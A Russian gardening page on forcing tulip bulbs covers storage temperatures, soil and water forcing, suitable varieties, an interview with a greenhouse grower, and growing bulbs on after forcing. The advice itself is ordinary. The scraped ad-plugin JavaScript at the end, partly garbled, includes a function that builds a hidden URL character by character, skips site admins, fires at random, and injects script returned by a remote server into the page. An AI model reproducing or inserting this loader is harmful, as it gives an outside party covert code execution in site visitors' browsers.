0 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Что делать после выгонки с луковицами тюльпанов

Что делать после выгонки с луковицами тюльпанов

Период выгонки тюльпанов сложный для растений и требует от них много усилий, поскольку мы насильно заставляем культуру начать вегетационный процесс не в положенное для этого время. Чтобы понять, что делать с луковицами тюльпанов после выгонки, когда они истощаются, а естественный процесс формирования деток и замещающего клубня нарушается, нужно знать определенные правила.

Сроки выкопки луковиц

После того как весенние луковичные цветы порадовали своим цветением, можно готовиться к выкопке клубней. Сортовые тюльпаны рекомендуют изымать из грунта ежегодно, обычные допустимо выкапывать 1 раз в 2-3 года.

До июня все сорта тюльпанов уже отцвели, их корневая система начинает постепенно отмирать. После срезки цветка на кусте еще на некоторое время оставляют 3-4 листка.

Продолжающийся процесс фотосинтеза дает возможность луковице подготовить себя и деток к предстоящему периоду покоя, окончательно сформироваться и запастись питательными веществами.

Медлить с выкопкой не нужно: слишком поздняя уборка может не позволить увидеть все луковицы в почве, и часть их может там остаться. Сбор посадочного материала начинают проводить после того, как оставшиеся листья приобрели бурый цвет. Этот период приходится на июнь-июль.

Осуществляя уборку луковиц, важно делать это с предельной аккуратностью, бережно. Любое повреждение клубня грозит его последующим заболеванием или гибелью. Поврежденные луковицы плохо хранятся, часто загнивают, заражая находящийся рядом посадочный материал.

Просушка

Чтобы луковицы тюльпанов хорошо хранились и были пригодными для последующей выгонки, их следует правильно подготовить.

  1. После изъятия посадочного материала из земли его следует тщательно очистить от остатков грунта.
  2. Сразу можно обработать клубни слабым раствором марганцовки, поместив в него луковицы на 15-30 минут.
  3. После этого луковицы складывают в легкие, проветриваемые ящики и помещают для просушки под навес или другое место, куда не попадают прямые солнечные лучи. Лишний раз клубни лучше не тревожить, это может привести к нанесению механических повреждений, что может спровоцировать возникновение заболеваний и гибель будущего растения.
  4. Если они просушиваются на открытом воздухе, на ночь емкости с посадочным материалом лучше убирать в сухое помещение. Это не позволит ночной влаге конденсироваться на клубнях.

Хранение

После просушивания клубни тюльпанов рекомендуется отсортировать по размерам, аккуратно отделить детки и поместить их в емкости, предназначенные для постоянного хранения материала.

Помещение, в котором будет храниться посадочный материал, должно иметь комнатную температуру и соответствующую влажность воздуха, которые дадут возможность хранить его максимально продолжительное время.

  1. Сорта тюльпанов, которые хорошо размножаются, лучше хранить при температуре, которая не превышает 20 °C. В начале осени температуру следует понизить до 15-17°C.
  2. Сортовые культуры, которые плохо поддаются размножению, следует хранить при температуре 23°C, в сентябре ее следует повысить до 25-27°C, а в октябре опустить до 17°C.
  3. Самые крупные луковицы, от которых впоследствии есть надежда получить максимальное количество деток и замещающих их клубней, хранят изначально при температуре до 30°C, постепенно понижая ее до 20°C. Это дает возможность прекратить формирование цветовой почки.
  4. Влажность воздуха в помещении, где хранятся луковицы тюльпанов, в среднем должна составлять 70-80 %. Более высокая влажность может спровоцировать возникновение различных грибковых заболеваний.

Периодически луковицы следует осматривать с целью возможного обнаружения заболевших клубней. Такие экземпляры следует немедленно удалить из общей емкости и уничтожить. Чтобы периодические осмотры можно было проводить без затруднений, рекомендуется выкладывать посадочный материал в один слой.

Период выгонки

Выгонку растений начинают в январе–феврале, в зависимости от сортности культуры. Делают это в специально оборудованных теплицах или дома на подоконнике в подходящей таре.

Важно помнить, что почва для этого должна быть плодородной, хорошо удобренной, а место, где располагаются будущие цветы, хорошо освещенным. Тогда ростки будут ровными, не искривленными, а сами цветки крупными и яркими.

Начинающим цветоводам следует помнить, что качество цветения тюльпанов в большой мере зависит от правильного хранения посадочного материала и обработки его от возможных заболеваний.

Грамотные рекомендации и советы дают возможность сохранить луковицы ранних лилейных цветов до момента их выгонки в идеальном состоянии. Это позволит любоваться их обильным, незабываемым цветением максимально продолжительное время.

Выгонка тюльпанов – правила и приемы

Выгонка тюльпанов под Новый год

Колоритные тюльпаны великолепно украсят дом, согреют его теплыми, яркими красками в течение зимних месяцев и ранней весной. Для ускорения цветения используют особый прием ‒ выгонку, что вполне доступно в домашних условиях и для начинающего цветовода.

Выгонка тюльпанов – что это значит?

Выгонка ‒ это способ выращивания, при котором цветения добиваются искусственно, раньше положенного срока. Наличие питательных веществ, а также нетребовательность к освещению ‒ именно те характеристики луковичных растений, которые позволяют добиться формирования корней, развития наземной части и полноценного цветения в комнатных или тепличных условиях.

Успех выгонки во многом зависит от исходного качества луковиц и условий их хранения. Правильное прохождение периода покоя обеспечит полноценное формирование всех органов растения, в том числе и цветка. Эти невидимые глазу процессы происходят незаметно, скрытые сочными и сухими чешуями.

Чтобы максимально приблизить стадию покоя к природным условиям, за этапом сушки и выдержки в тепле должен следовать период пониженных температур.

Цветущие тюльпаны можно получить уже к зимним праздникам – к Новому году и Рождеству, но лучшая выгонка получается, начиная с февраля. Зацветают тюльпаны через 21–25 дней с момента установки на подоконник в теплой комнате. Чтобы добиться цветения к 8 Марта, укорененные луковицы заносят в помещение 10–11 февраля. Сроки могут колебаться в зависимости от сорта.

Технология выгонки

Выгонка тюльпанов в домашних условиях

Успех выгонки зависит от сочетания всех важных факторов – от момента посадки и выращивания в грунте, до выкопки, хранения, укоренения и этапа выхода окрашенного бутона.

Выращивание и уборка луковиц

За тюльпанами, с которых намереваются получить луковицы на выгонку, ухаживают более тщательно, чем за растениями, которые используются в озеленении. Обязательны тщательные прополки, рыхление грунта, поливы в засушливые периоды, желательно использовать мульчу.

Через 2–3 дня после раскрытия бутона проводят обязательную декапитацию, срезая цветок. Это предотвратит отток питательных веществ на образование семенной коробочки и даст более сильный посадочный материал. Уход за растением продолжают на протяжении двух-трех недель, поскольку в этот период продолжается формирование зачатка цветка.

Когда листья начнут желтеть, луковицы выкапывают и просушивают на решетах в тени или в помещении с хорошей вентиляцией. После просушки проводят осмотр, выбраковывая поврежденные и пораженные грибковыми болезнями экземпляры, отбирая крупные, первого или экстра-класса, не легче 25–30 г.

Съем жестких покровных чешуй сразу после выкопки может привести к пересыханию и повреждениям во время хранения. В то же время перед высадкой чешуи лучше снять, это позволит распознать очаги поражения фузариозом. Кроме того, чешуя станет препятствовать нормальному укоренению – нередки случаи, когда корни подворачиваются под нее и растут вверх.

Правила хранения

После просушивания луковицы укладывают в пластиковые ящики или картонные коробки с отверстиями и заносят в проветриваемое помещение, храня при температуре 21–23°C на протяжении 30–35 дней. Эта выдержка при плюсовой температуре важна для формирования цветка. На протяжении следующего месяца температуру понижают до 19–20°C, а еще через месяц (что обычно припадает на сентябрь) показатели понижают до 16–17°C. Такие температуры типичны для естественной погоды и поэтому сложностей с их достижением обычно не возникает.

Процесс закладки цветочного зачатка длителен и должен быть полностью завершен до момента охлаждения. Для получения цветущих растений к новогодним или рождественским праздникам этап созревания ускоряют. Отчасти этому служит проведенная декапитация. Кроме того, опытные цветоводы практикуют раннюю выкопку при легком пожелтении внешних чешуй и выдержку в течение 7–8 дней при температуре 32–34°C, что ускорит процесс образования цветка.

Последующее охлаждение – обязательный этап, который необходим для природного погружения луковицы в период спячки. В домашних условиях небольшое количество посадочного материала можно поместить на нижнюю полку холодильника.

В конце октября тюльпаны высаживают в горшки, после чего заносят в подвал или другое холодное помещение и ставят на укоренение при показателях 2–7°C. Начиная с середины декабря температуру удерживают в пределах 4–5°C, иначе появившиеся ростки могут слишком вытянуться. Укоренение и прорастание длится от 16 до 22 недель, в зависимости от сорта.

Особенности посадки

Для выгонки применяют два основных способа: в субстрате или воде (на гидропонике).

Выращивание в субстрате

Выгонка тюльпанов в субстрате

Субстратом может служить пористый легкий материал: чистый песок, вермикулит или смесь этих компонентов с торфом, землей, перегноем. Если планируется дальнейшее использование луковиц, лучше остановиться на питательной смеси следующего состава:

  • дерновая земля ‒ 2 части;
  • торф нейтральной реакции – 1 часть;
  • перегной – 1 часть;
  • песок – 1 часть;
  • древесная зола – 1 стакан на ведро смеси.

В субстрат можно добавить гранулированное удобрение пролонгированного действия для цветущих растений, например, марки Агрикола.

Успешно выращивают тюльпаны и на такой почве:

  • дерновая земля – 2 части;
  • перегнойная земля – 2 части;
  • песок – 1 часть.

Опилки в качестве субстрата использовать нежелательно, они плохо держат влагу и зачастую обладают кислой реакцией. Другой их недостаток – способность улавливать азотистые соединения, поэтому растения придется поливать жидкими удобрениями.

Можно использовать для посадки готовые землесмеси для цветущих растений или специализированные субстраты для выгонки луковичных видов.

Для посадки берут глиняные горшки диаметром 12–15 см, куда можно высадить по три луковицы, или деревянные ящики. Грунт тщательно перемешивают и погружают в емкость, заполняя ее до двух третей объема.

Поверхность слегка уплотняют и высаживают луковицы, вдавливая в землю, ориентируя плоской стороной к стенке горшка (тогда первый лист будет повернут наружу, что выглядит более эффектно). Субстрат досыпают, не доходя 1 см до края, и снова уплотняют, аккуратно прижимая. При посадке важно следить, чтобы луковицы были однородными и не касались друг друга, а верхушка не была засыпана почвой.

После посадки проводят умеренный полив бледно-розовым раствором марганцовки. Ухаживая за луковицами в процессе укоренения, их поливают каждую неделю.

Заносят укорененные тюльпаны в теплое помещение за 21–25 дней до предполагаемого цветения и размещают на светлых окнах при температуре 12–14°C, через 3–5 дней показатели повышают до 18–19°C. Цветущие растения с полностью окрашенными бутонами лучше держать при температуре 14–15°C, что продлит цветение. Слишком высокая температура приведет к вытягиванию. Длинные стебли подвязывают к опорам.

Выгонка в воде

Выгонка тюльпанов в воде

При выгонке в условиях гидропоники можно получить красивые цветущие растения, но луковицы после этого непригодны к доращиванию. Этот способ применяется в том случае, когда нет условий для установки объемных горшков или ящиков с субстратом.

Для такой выгонки используют стаканы или специальные узкие бокалы, налитые чистой водой, укладывают сверху кружки из фанеры по диаметру емкости. В кружке проделывают небольшое отверстие для донца, луковицу устанавливают на стакан, следя, чтобы уровень воды был чуть ниже донца (на 1–2 миллиметра).

Можно заполнить стеклянный сосуд керамзитом, слегка вдавить в рыхлую поверхность одну или несколько луковиц, и налить воду на 1–2 мм ниже донца.

Установку проводят в октябре-ноябре, размещая тюльпаны в темном холодном месте ‒ темной кладовой или подвале при температуре 4–6°C. Важно проследить, чтобы посадки не испортили мыши. Если помещение светлое, сосуды накрывают темными колпаками.

Во время роста регулярно подливают воду, осторожно приподнимая кружок или пуская струйку по стенке сосуда с керамзитом. При этом обязательно оставляют воздушную прослойку для дыхания, между уровнем воды и донцем луковицы. Во избежание порчи воды на дно сосуда можно положить таблетку активированного угля или немного древесного.

Примерно через 55–60 дней появится бледный росток, по достижении им длины 10–12 см тюльпан заносят в комнату и устанавливают в светлом месте с температурой 12–14°C, изменяя температурные показатели, как и для выращивания на субстрате. Если начать гидропонную выгонку в конце октября, цветущие тюльпаны можно получить в начале марта.

Сорта тюльпанов для выгонки

Перпл Принц (Purple Prince)

В зависимости от сроков цветения тюльпанов, выгонка бывает трех типов:

  • ранняя – к Новому году и Рождеству, а также в течение всего января;
  • средняя – в феврале и начале марта;
  • поздняя – в марте и апреле.

Выгонка к маю мало распространена и актуальна для северных регионов.

Для зимне-весеннего цветения подходят не все сорта тюльпанов, лучше других удаются Дарвиновы гибриды и класс Простых ранних. Бахромчатые, махровые и лилиецветные разновидности выращиваются в комнатах реже, хотя они потрясающе эффектны. Ниже представлены классические и новые сорта для разных периодов выгонки.

Ранние сроки:

  • Кристмас Марвел (Christmas Marvel) – настоящее «рождественское чудо», сиренево-розовый, атласный;
  • Бриллиант Стар (Brilliant Star) – насыщенно-красный;
  • Перпл Принц (Purple Prince) – густой пурпурно-лиловый;
  • Эприкот Бьюти (Apricot Beauty) – абрикосовый, нежный, пастельный;
  • Люстиге Витве (Lustige Witwe) – темно-розовый с белой каймой;
  • Шуга Принц (Sugar Prince) – изящный, розово-лиловый.

Средние сроки:

  • Лондон (London) – шарлахово-красный;
  • Оксфорд (Oxford) – ярко-красный с желтой серединкой;
  • Эрик Хофсью (Eric Hofsjo) – малиново-красный с кремовой каймой;
  • Принц Голд (Prince Gold) – золотисто-желтый;
  • Притти Вумен (Pretty Woman) ‒ лилиецветный, малиново-красный;
  • Дэвенпорт (Davenport) – бахромчатый, красный с золотистой каймой, колоритный;
  • Салмон Импрешн (Salmon Impression) – лососево-розовый;
  • Фэнтази Леди (Fantasy Lady) – махровый, малиново-розовый с широкой белой каймой.

Поздние сроки:

  • Америка (America) – очень крупный, малиново-красный с алой каймой;
  • Бургунди Лейс (Burgundy Lace) – бахромчатый, малиново-розовый, классический;
  • Трипл А (Triple A) – голландская новинка, красно-оранжевый с тонкой золотистой каймой, идеальный бокал;
  • Эсприт (Esprit) – бахромчатый, махровый, розовато-оранжевый с зеленым тоном;
  • Хиберния (Hibernia) – кремово-белый, округлый;
  • Сенсуал Тач (Sensual Touch) – бахромчатый, махровый, густого оранжевого тона;
  • Версаче (Versace) – бахромчатый, блестящий, темно-красный;
  • Вайолет Прана (Violet Prana) – густомахровый лиловый, широко раскрывается, кружевной.

Для поздней выгонки подходят и другие сорта, включая классы Триумф, Попугайные и Зеленоцветные.

Доращивание луковиц после выгонки

Сильные луковицы после выгонки в субстрате можно успешно доращивать, что позволяет сохранить ценный посадочный материал красивого сорта. Если луковицы не представляют особой ценности, их выбрасывают. В любом случае для повторной выгонки они непригодны.

Не удаются в доращивании и луковицы тюльпанов, выращенные в условиях гидропоники, которые использовали все внутренние резервы для цветения и слишком слабы. Плохо доращиваются экземпляры, перенесшие январскую выгонку.

Доращивание дает возможность использовать посадочный материал в дальнейшем для озеленения и размножения. Суть его в том, чтобы создать для тюльпана, растущего в комнате, условия, максимально приближенные к естественным. Это даст возможность растению накопить питательные вещества и завершить цикл развития. Поэтому важно изначально приготовить полноценный субстрат с перегноем и дерновой землей, желательно внести гранулированное удобрение и обеспечить подсветку.

Если для выгонки были выбраны низкорослые ботанические разновидности, после цветения удаляют короткий цветонос и листья, выжидают три недели, извлекают луковицу и подсушивают.

По окончании цветения высокорослых сортов увядший цветок осторожно удаляют, оставив цветонос. За растением продолжают ухаживать и поливать, пока листья не начнут желтеть, затем тюльпан осторожно достают из горшка, отряхивают почву и просушивают, после чего удаляют листья.

Просушивать луковицы лучше на протяжении 10–14 дней при 24–25°C, затем температуру понижают до 18–20°C, поддерживая параметры на протяжении месяца, в дальнейшем хранят в прохладном проветриваемом помещении при 15–17°C. Осенью луковицы высаживают на клумбу обычным способом.

Видео: технология выгонки тюльпанов

Тюльпаны – распространенные, доступные луковичные растения, которые чудесно украсят комнаты в холодное время года. А вазон с выращенными собственными руками нежными цветами – замечательный подарок, который скажет о чувствах дарителя больше, чем самые душевные слова.

Что делать после выгонки с луковицами тюльпанов

Семейное дело… Как все началось? Обучались самостоятельно или получали специальное образование?

Да, бизнес у нас семейный, мы пришли в него благодаря родителям. Находясь в декрете, искала работу на фрилансе в сфере бизнес-образования. Это был 2008 год, кругом сокращения, работу я не нашла. И именно в этот момент родители предложили попробовать вырастить рассаду у них в теплицах. И у нас получилось! Ну, а дальше было строительство собственных теплиц и подбор ассортимента.

Какое растение стало первым в вашем ассортименте?

Это была рассада петунии — первые несколько лет все площади в теплицах были заняты именно ей.

Скоро праздники, в такие дни цветы нужны всем. Как вы к ним готовитесь?

Подготовка к большим праздникам, когда цветок очень востребован, всегда начинается заранее. Например, луковицу тюльпана мы начинаем заказывать в начале лета, получаем ее в конце сентября, а срезаем цветок лишь в феврале. Да, именно в конце февраля, не седьмого марта.

Отгрузки идут с первых чисел марта, к этому моменту нужно знать точное количество срезанных цветов. При правильном хранении тюльпан сохраняет свежесть очень долго и в вазе у клиента стоит не меньше недели.

Какими должны быть луковицы, чтобы из них получился красивый цветок?

Мы работаем с голландской луковицей, которая в течение нескольких лет проходит специальную подготовку — растет, ей не дают цвести, правильно подкармливают. В результате таких действий она накапливает хороший ресурс и выдает красивый, крупный цветок.


Правила выгонки* одинаковы для всех луковичных, или у каждого вида свои?

У каждого вида свои особенности. Более того, даже разные сорта тюльпанов требуют различных условий — одни любят прохладу, другим нужны условия потеплее.

Размещая ящики с луковицами в теплице, всегда приходится помнить об этом, так как нарушение технологии всегда ведет к потере качества и большему количеству брака.

Зачем чистить луковицу перед выгонкой? И зачем гладить побеги? Какие еще есть секреты?

Насчет чистки луковицы перед посадкой нет единого мнения. Мы не чистим, потому что так есть риск ее травмировать и занести инфекцию, а всего одна больная луковица может инфицировать все, что с ней рядом. А гладить побеги — не знаю, миф это или правда, но так рекомендуют делать, чтобы выделяемый растениями газ распределялся между ними равномерно, и они одновременно окрашивались. Это существенно упрощает срезку.

______________
*Выгонка — когда растению принудительно создают условия для того, чтобы оно зацвело к назначенному времени.

Сейчас стало модным дарить букеты с луковицами. Эти луковицы можно затем реанимировать и высадить на участке?

Действительно, есть коллеги, кто хранит тюльпан «на луковице». Но с практической точки зрения это невыгодно ни продавцу, ни покупателю. Необходимо больше холодильников для хранения, оптовым покупателям приходится делать дополнительную работу, отрезать луковицу, а время в мартовские праздники — очень ценный ресурс, ведь нужно в это же время делать букеты и работать с покупателями.

Из луковицы после выгонки выжаты все жизненные силы, когда она отдает цветок, то делится на несколько маленьких. Если эти луковицы осенью посадить в саду, то зацветет из них на следующий год лишь десять-двадцать процентов, и то, мелкими цветами. Через год — то же самое, и лишь спустя три-четыре года можно будет увидеть много полноценных луковиц.

Какие сорта тюльпанов самые востребованные на сегодня? Есть ли что-то, что выращивается только по спецзаказу?

Хит продаж — это классические тюльпаны: красные, желтые, белые, фиолетовые, с цветной каемкой. Такие цветы прекрасно воспринимаются в любой точке продаж.

Пионовидные же, бахромчатые, попугайные или с диковинными расцветками — товар для хороших цветочных салонов, в которых покупатель ищет что-то необычное.

Тюльпаны по спецзаказу не выращиваем — во-первых, луковицы заказываем летом, а в это время ни один клиент еще не думает о восьмом марта; во-вторых, посадочный материал необычных сортов всегда дороже при закупке, а стоимость самого цветка сильно не меняется; третья причина — такие сорта всегда сложнее в выгонке и имеют большее количество выпада* и брака.

Как производителю, нам гораздо выгоднее работать с самыми востребованными и устойчивыми сортами.

Как правильно выбирать цветы?

При выборе цветов есть золотое правило «цена-качество», ведь хороший товар не может стоить дешево.
___________
*Выпад — когда луковица не прорастает или погибает росток.

Когда планируете посадки, на что ориентируетесь? Сажаете с запасом или под заказ? С лучается ли перепроизводство?

В начале своей деятельности ориентировались на запросы клиентов, но ситуация на рынке меняется ежегодно — если в этом году все предпочитают белый тюльпан, то скорее всего на следующий год в фаворитах будет другая расцветка, а какая именно — угадать невозможно. Поэтому при выборе сортов стараемся брать все пропорционально, чтобы по минимуму зависеть от таких всплесков.

Перепроизводство по тюльпану крайне невыгодно — луковица дорогая, плюс отопление и оплата труда работников, поэтому продать нужно все до единого цветка. Вовремя сделанная срезка позволяет понять, сколько реально будет тюльпанов, чтобы взять точное количество заказов (ведь брак всегда есть, от 2% и более).

Как отдыхаете после праздничного марафона?

Восьмого марта праздничный ужин, а девятого — уже на работу:) Начинаем сезон рассады.

У вас есть девиз или фраза, которая помогает?
Конечно:) Все хорошо, а будет — еще лучше!

Что бы вы пожелали нашим читателям в преддверии праздников?

Здоровья, крепкой семьи и полного кошелька:)

Выгонка тюльпанов. Срезка и хранение

Тюльпаны срезают в фазе окрашенного бутона утром до полива со всеми листьями у основания стебля и помещают в прохладное помещение при температуре +5+6 о С.

Если срезка получилась недостаточно высокой, и в дальнейшем не планируется сохранение луковиц после выгонки, растения выдергивают целиком, вместе с луковицей. Срезав донце и очистив стебель от луковичных чешуй, можно удлинить срезку на 5-6 см. Сегодня модно ставить в прозрачные вазы букеты из тюльпанов вместе с луковицами. Это не только стильный дизайнерский прием, но и способ более длительного сохранения срезки.

Хранение срезки тюльпанов

Существует два варианта хранения срезки тюльпанов – сухое и в воде. При необходимости длительного хранения нужно отдавать предпочтение первому. И в том, и в другом случае растения продолжают рост, поэтому нужно оставлять пространство при укладке срезки в ящики.

Сухое хранение: Срезанные цветы заворачивают в бумагу (по 10-50 шт.) и помещают в темный холодильник без воды при температуре +2+3 о С и влажности воздуха 96-98%. В этих условиях цветы могут храниться в течение 2 недель, медленно продолжая рост, но не теряя декоративных качеств. Даже небольшое присутствие света вызывает искривление стеблей в сторону его источника. Если необходимо работать со срезкой в хранилище, устанавливают лампу зеленой части спектра минимальной мощности. На такое освещение растения не реагируют.

Перед работой с цветами срезы стеблей обновляют, вновь заворачивают в бумагу и ставят в воду. В течение 0,5 часа тургор восстановится и бумагу можно будет убрать. Нельзя хранить цветы в холодильнике вместе с овощами и фруктами, т. к. они выделяют этилен, ускоряющий старение цветков.

Хранение в воде: Выдержать в холодной воде сутки при +8 о С, а лучше 0,1% растворе кальциевой селитры. Стебли приобретают прочность, а цветы сохраняются дольше. Если цветы распустились рано, можно хранить их 1,5-2 недели в воде со снегом, в темноте, при температуре +2 о С.

Использование луковиц тюльпанов после выгонки

Если срезка производилась у основания стеблей, то поливы прекращают, а спустя 3 недели луковицы выбирают. За это время замещающие луковицы полностью сформируются.

Если был оставлен один лист, что возможно при выгонке высокорослых сортов, то растения после срезки подкармливают специальным жидким удобрением для луковичных, поливают до пожелтения листьев и продолжают досвечивание или максимально используют солнечный свет. Для отдельных сортов в этом случае можно получить замещающие луковицы 1 разбора и довольно крупную детку.

Далее полив прекращают, посадки подсушивают 2 недели при +24 о С. Луковицы выбирают из субстрата и размещают в сетчатых ящиках для просушки и дальнейшего хранения при температуре +17 0 С и влажности 70-80%. Затем отбирают луковицы весом 12-15 г и используют для доращивания. Округлые луковицы оставляют, плоские выбрасывают, так как они могут оказаться не способны к закладке цветочной почки. Луковицы январской выгонки доращивать нецелесообразно, они не образуют замещающих луковиц 1 и 2 разборов, крайне мало 3 разбора и крупной детки.

Отобранные луковицы хранят при +17+20 о С в течение месяца, затем при +14+15 о С до самой осенней посадки. При таких условиях луковицы не усыхают и не прорастают преждевременно, несмотря на то, что формирование цветков в них заканчивается на 2-2,5 месяца раньше, чем у луковиц, выращенных в грунте. В грунт сажают в обычные сроки осенью, последними из тюльпанов, как можно позже.

Доращивание луковиц после мартовской выгонки позволяет на следующий год получить около 30% луковиц 1 разбора, а некоторые даже «экстра», снова пригодные для выгонки.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};